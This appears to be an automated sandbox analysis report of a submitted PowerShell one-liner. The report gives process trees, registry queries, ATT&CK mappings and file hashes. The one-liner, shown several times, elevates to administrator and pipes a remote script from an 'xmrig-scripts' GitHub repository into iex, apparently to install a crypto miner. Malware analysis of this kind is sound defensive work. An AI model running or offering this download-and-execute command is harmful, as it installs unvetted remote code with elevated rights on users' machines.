hxxp://start-process PowerShell -verb runas irm hxxps://raw[.]githubusercontent[.]com/Lachine1/xmrig-scripts/main/windows[.]ps1 | iex

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
15/09/2024, 12:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Score

3^/10

defense_evasion discovery privilege_escalation

Malware Config

Signatures

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
4004	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 5 IoCs

pid	Process
5920	WINWORD.EXE
5920	WINWORD.EXE
2064	EXCEL.EXE
3204	WINWORD.EXE
3204	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1364	msedge.exe
1364	msedge.exe
4004	msedge.exe
4004	msedge.exe
4024	identity_helper.exe
4024	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeTcbPrivilege	1864	svchost.exe
Token: SeRestorePrivilege	1864	svchost.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe
4004	msedge.exe

Suspicious use of SetWindowsHookEx 33 IoCs

pid	Process
5920	WINWORD.EXE
5920	WINWORD.EXE
5920	WINWORD.EXE
5920	WINWORD.EXE
5920	WINWORD.EXE
5920	WINWORD.EXE
5920	WINWORD.EXE
5920	WINWORD.EXE
5920	WINWORD.EXE
5920	WINWORD.EXE
2064	EXCEL.EXE
2064	EXCEL.EXE
2064	EXCEL.EXE
2064	EXCEL.EXE
2064	EXCEL.EXE
2064	EXCEL.EXE
2064	EXCEL.EXE
2064	EXCEL.EXE
2064	EXCEL.EXE
2064	EXCEL.EXE
2064	EXCEL.EXE
2064	EXCEL.EXE
2064	EXCEL.EXE
3204	WINWORD.EXE
3204	WINWORD.EXE
3204	WINWORD.EXE
3204	WINWORD.EXE
3204	WINWORD.EXE
3204	WINWORD.EXE
3204	WINWORD.EXE
3204	WINWORD.EXE
3204	WINWORD.EXE
3204	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4004 wrote to memory of 2224	4004	msedge.exe	85
PID 4004 wrote to memory of 2224	4004	msedge.exe	85
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1252	4004	msedge.exe	86
PID 4004 wrote to memory of 1364	4004	msedge.exe	87
PID 4004 wrote to memory of 1364	4004	msedge.exe	87
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88
PID 4004 wrote to memory of 4476	4004	msedge.exe	88

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
1⤵
- Access Token Manipulation: Create Process with Token
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbd21b46f8,0x7ffbd21b4708,0x7ffbd21b4718
  2⤵
  PID:2224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,17717423762527062774,13579887798147457906,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
  2⤵
  PID:1252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,17717423762527062774,13579887798147457906,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,17717423762527062774,13579887798147457906,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:8
  2⤵
  PID:4476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,17717423762527062774,13579887798147457906,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
  2⤵
  PID:1952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,17717423762527062774,13579887798147457906,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:1896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,17717423762527062774,13579887798147457906,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
  2⤵
  PID:464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,17717423762527062774,13579887798147457906,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
  2⤵
  PID:2932
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,17717423762527062774,13579887798147457906,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 /prefetch:8
  2⤵
  PID:2064
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,17717423762527062774,13579887798147457906,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,17717423762527062774,13579887798147457906,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:1
  2⤵
  PID:4520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,17717423762527062774,13579887798147457906,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
  2⤵
  PID:2912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,17717423762527062774,13579887798147457906,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
  2⤵
  PID:3780

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2580

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:5256

C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5920

C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2064

C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1864
- C:\Windows\system32\dashost.exe
  dashost.exe {f1049031-676f-4b4f-81046c8c59049e51}
  2⤵
  PID:440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Filesize
471B

MD5
f4e6062cf17ef3b29dc422c6ca271d21

SHA1
16562f4043d5356dfdbbd78f38069594f13e7186

SHA256
2b8477fc96925ebb10660826dcd6345bad44ef2b2acc268a274f99335ad81403

SHA512
711c2cd99b26ef8a9dbcba96ead034ca885ca7df7d3b64a14ca84327df54675df962c10b1ec4ce39add2cd5dafbad4b06f914aebffab0d6a1300edf65893975d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Filesize
412B

MD5
8f4a238b58097acf13fbecd7ddfca4ad

SHA1
214542726915538c14321c7db5c1258d127fa402

SHA256
ae6bdf10185dc28a56931764ee8b017a5faa4776b10a5137cd26e24d91d473d0

SHA512
f2f1e0fd1780522feb536ab954a4a635e9c624da155395346226f3446cc6ad4028302cb0b1fc29dfa2eaee7946379148a2c65a93d2e15dae056953bb4d1cb64a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e4f80e7950cbd3bb11257d2000cb885e

SHA1
10ac643904d539042d8f7aa4a312b13ec2106035

SHA256
1184ee8d32d0edecddd93403fb888fad6b3e2a710d37335c3989cc529bc08124

SHA512
2b92c9807fdcd937e514d4e7e1cc7c2d3e3aa162099b7289ceac2feea72d1a4afbadf1c09b3075d470efadf9a9edd63e07ea7e7a98d22243e45b3d53473fa4f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2dc1a9f2f3f8c3cfe51bb29b078166c5

SHA1
eaf3c3dad3c8dc6f18dc3e055b415da78b704402

SHA256
dcb76fa365c2d9ee213b224a91cdd806d30b1e8652d72a22f2371124fa4479fa

SHA512
682061d9cc86a6e5d99d022da776fb554350fc95efbf29cd84c1db4e2b7161b76cd1de48335bcc3a25633079fb0bd412e4f4795ed6291c65e9bc28d95330bb25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
59392240b09edbf12548837acdb93859

SHA1
b570e9a74f51d0af00e3e5e98fa85e7b90d504e8

SHA256
70644c62fdce167b6c60a7a8e1335fa2e08da960c3c3b8b756f4f280c9d57378

SHA512
1744072744f01a5aa84ac29a64fd0624b2f1c91fbb9119c8110b5f92a14d953249c9d95149740b7587c5c70873412f8063dd478aaedba1f80d282dd73f60d183

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e48681daf80da6ed24725bd9cce45e11

SHA1
361280b0322327158555e5fa070cba0473afe474

SHA256
fff0e430379b499abf291dd0579e8963b4f440f86fa758c499180a76a416ba70

SHA512
f294d87766413e1c57d8321678b588fcbbb99e83cdfde1cc8401811421c4644ba94f86e3419d4906a931b8192c90616351e962369426de89aa841a2ab3d4e391

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ae711c72bde1ef02687cc32516ff1d6d

SHA1
414435cf16e242d9a5bf7ab0177f4a958212cf84

SHA256
fcdb516c607bce70b4395f27c127ae553d6244aa66141b65855289e2011c50de

SHA512
01a15e5f3e2df01f992874f3167d04ad2ebbf4088f38e91f7c819f68ba39be58e572c9649f4e3e488f386cdedf2ba03dda0e34b632cd5c1cc832ad67ea3b7ff3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
eb9ab323a8d69b39021f4883d45f36d2

SHA1
6fad4a26abca675566950d9cea6cbd21337cc6d3

SHA256
07db268d9f989a3489a4d29608abb41112948b2937a4015f49adb1ed1309dabe

SHA512
91a281a453ecf67412f98cf2d8009d5cd536adb6ab813ce630652aadc866782a8fd43e84611693046b745946d9a4e2bfc363522671b0b40dc8ed831ce2377cf2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
fd79fe3604cab33d97704abf521aff00

SHA1
f8c376941739b1399dfe287de17872ffb847cbc0

SHA256
2e1912665801bedc009b28b28926b01af6cc71784ce86802e03fd5d2c415b3c1

SHA512
ae0e96c48b1efa6e3809c6264af7ec75fb694fdf8d44b9862a5d7486b599dfbe712dca6d6e45eb2226a3e7ff69c42dbed5f80628b4db44288aa7adfcd46305ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
13149b0574dc16de25bbd493046974bf

SHA1
6ace7084f03e88af1a8d85f74a9a1bd368204550

SHA256
a2fcb2176f95525b109fa2789cbb560331bc4c6763d57eac7f4c938475484b21

SHA512
70c47c03d9809f9dec21c658173816edf126c7f556d9302db89b413ee0a2c886c20b1ef46462fa286183eeb9f5a9625636c4f3cdeca168ebb34ca08c2f3581b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.CampaignStates.json

Filesize
21B

MD5
f1b59332b953b3c99b3c95a44249c0d2

SHA1
1b16a2ca32bf8481e18ff8b7365229b598908991

SHA256
138e49660d259061d8152137abd8829acdfb78b69179890beb489fe3ffe23e0c

SHA512
3c1f99ecc394df3741be875fbe8d95e249d1d9ac220805794a22caf81620d5fdd3cce19260d94c0829b3160b28a2b4042e46b56398e60f72134e49254e9679a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.GovernedChannelStates.json

Filesize
417B

MD5
c56ff60fbd601e84edd5a0ff1010d584

SHA1
342abb130dabeacde1d8ced806d67a3aef00a749

SHA256
200e8cc8dd12e22c9720be73092eafb620435d4569dbdcdba9404ace2aa4343c

SHA512
acd2054fddb33b55b58b870edd4eb6a3cdd3131dfe6139cb3d27054ac2b2a460694c9be9c2a1da0f85606e95e7f393cf16868b6c654e78a664799bc3418da86e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.Settings.json

Filesize
87B

MD5
e4e83f8123e9740b8aa3c3dfa77c1c04

SHA1
5281eae96efde7b0e16a1d977f005f0d3bd7aad0

SHA256
6034f27b0823b2a6a76fe296e851939fd05324d0af9d55f249c79af118b0eb31

SHA512
bd6b33fd2bbce4a46991bc0d877695d16f7e60b1959a0defc79b627e569e5c6cac7b4ad4e3e1d8389a08584602a51cf84d44cf247f03beb95f7d307fbba12bb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyHistoryStats.json

Filesize
14B

MD5
6ca4960355e4951c72aa5f6364e459d5

SHA1
2fd90b4ec32804dff7a41b6e63c8b0a40b592113

SHA256
88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3

SHA512
8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DEE401B7-8F41-4E53-B661-D170A34E1CB6

Filesize
171KB

MD5
ec4800df523947da8a669c80f0b06b2e

SHA1
2370c9a1a7cab661ba507ee5a4030ac6eb2fe23d

SHA256
65138c0479013124569805750c0c3dfbcf608696ad353d8889f2a61075196aac

SHA512
08b1460101c344593932d9df3d71cebcd7ec52feeef2135219a223fb5632627b7aca802d885120a5749650fff5088b021ea16e2fd24b659fecb2b1707ad40ed5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\logs\mip_sdk.miplog

Filesize
12KB

MD5
fce274ab52c0ad1513049e7f1f0fd98a

SHA1
b0c5f75ab1b372c1d650b50a7016873ba17039cb

SHA256
c0d0d56968c91dc0665b8153ee87c5280633648bb53188281f2969a1826bc9af

SHA512
8e83361ee1f94d5f536b664c0484a017817bb99925c63ed6b40d2e294425085d8d29e97ca0aa8582cd7134f3346c0e811dfb82436e14923c196b79f0a2c959e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\logs\mip_sdk.miplog

Filesize
15KB

MD5
f44cad1b2ff77a711fce5fec464874cf

SHA1
ae2640ae827feb4935afe04555f23af39d19c0c1

SHA256
6afbc3fa9a94b89adb87f93f43cf8880c0d05ab9c5b57033c5755d544b0a149f

SHA512
6e7b40eedc15bdf2fe30e0c372c29ab0e0d2681e1b35e6d905b5ebcfd8ce81e6314e1e004288815132cdf1808ff13daaee13156220db7ffa1d5f24b213620de8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\winword.exe.db

Filesize
24KB

MD5
13d856202218c21b6fdd4e6a642770c1

SHA1
806f7e8d1c2a5d213c483a639f4f97d74c030979

SHA256
364030bb41afbd1240433938fe65f1383219c7c1fe35e6da2527dbfec95b4cc4

SHA512
b54e85a6c453619ce8083eebfa498fe4327ac4dc095303bc9ca469e416902393708d3d7079aaae14329f25ed52e35036af6eadafc951d7c80256c48263da01b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Filesize
2KB

MD5
89e53e59993ec4f7a4e7783052808ffb

SHA1
9af4799b10303db007aaa2f3dd060e90848cdb74

SHA256
558ee34656a3529f57d86af5e86f70bd79c0fd7dc515adfde9d07345fe37c63a

SHA512
8b6c7168478ac3b172779485612098300551ae68296306af8f4b9fbddf401402b7a174e3fc57501c336845ec1f7bdb19a1d36ad0b60cd55b9d8533d7039da684

Download Submit
